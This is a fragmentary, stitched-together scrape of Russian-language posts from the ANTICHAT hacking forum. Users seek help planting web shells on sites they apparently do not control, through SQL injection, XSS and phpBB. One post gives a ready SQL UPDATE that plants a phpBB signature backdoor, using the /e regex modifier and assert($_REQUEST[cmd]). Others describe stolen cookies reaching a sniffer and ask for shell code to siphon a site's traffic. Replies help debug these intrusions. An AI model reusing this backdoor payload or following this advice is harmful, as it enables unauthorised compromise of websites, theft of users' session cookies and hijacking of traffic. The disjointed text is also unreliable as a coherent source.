ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Да ладно?

Какие именно ограничения будут у copy() и не будут у move_uploaded_file() при сейфмоде не просветите?

Тёща, отпиши в личку, напишу скрипт.

Все привет, у меня чисто теоретический вопрос - нашел сегодня маленький сайтик - голый html, ни одного php-скрипта, 100%. Все что есть - это корневой каталог со страничками и папка /cgi-bin, в ней лежит чей-то шелл.

Вопрос - каким образом возможно залить его? В .htaccess никакой магии с интерпретацией html как php нет. Права на папку - drwxr-xr-x. Safe mode: OFF если что, система - линукс.

=Zeus=,

через соседей, через саппорт хостинга

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:assert(stripslashes($_REQUEST[cmd]));' WHERE user_id=2;

сделал восстановление в бд, открыл профиль, на других такого никогда не было

что за ошибка такая ?

Хочу залить шелл через SQL-injection. Нашел на сервере phpinfo. Знаю полный путь.

Запрос

Запрос идет...открываю http://www.site.com/1.php?cmd=phpinfo {ничего не выводиться}

В чем ошибка? или я что-то упустил (в настройках сервера какую ту функцию)

phpinfo() это функция, а не константа, после имени идут скобки и " ; "

+ у тебя system, код не eval -ится, не сможешь вывести phpinfo, только системные команды

кто подскажет в чем проблемма,нашел xss активную попробывал впихуть скрипт в страницу,куки сразу пришли на снифер ,а вот код в странице не сохранился

xss в POST запросе

Собственно у меня вопрос. Если я имею доступ к одному сайту (или к шаблонам) что мне вставить в php код (какой код шелла) что бы трафик просто сливался на один сайт и все.

Заранее спасибо!